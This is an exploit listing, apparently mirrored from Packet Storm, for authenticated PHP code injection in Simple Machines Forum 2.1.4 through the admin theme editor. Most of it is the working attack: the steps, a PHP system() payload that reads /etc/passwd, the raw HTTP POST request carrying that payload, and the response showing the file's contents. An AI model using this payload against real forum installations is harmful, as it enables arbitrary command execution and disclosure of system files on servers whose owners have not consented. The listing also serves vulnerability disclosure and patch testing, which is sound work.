Simple Machines Forum 2.1.4 Code Injection exploit

Share

## https://sploitus.com/exploit?id=PACKETSTORM:180255 # Exploit Title: Authenticated Code Injection - smfv2.1.4 # Date: 8/2024 # Exploit Author: Andrey Stoykov # Version: 2.1.4 # Tested on: Ubuntu 22.04 # Blog: https://msecureltd.blogspot.com/2024/06/friday-fun-pentest-series-7-smfv214.html Code Injection Authenticated: Steps to Reproduce: 1. Login as admin 2. Browse to "Current Theme" 3. Click on "Modify Themes" > "SMF Default Theme" 4. Click on Admin.template.php 5. In the first box enter the PHP payload "<?php system('cat /etc/passwd') ?>" // HTTP POST request showing the code injection payload POST /SMFdbwci7dy0o/index.php?action=admin;area=theme;th=1;sa=edit HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.57 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 [...] entire_file[]=<?php+system('cat /etc/passwd') ?>[...] // HTTP response showing /etc/passwd contents HTTP/1.1 200 OK Server: Apache Pragma: no-cache [...] [...] root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin [...]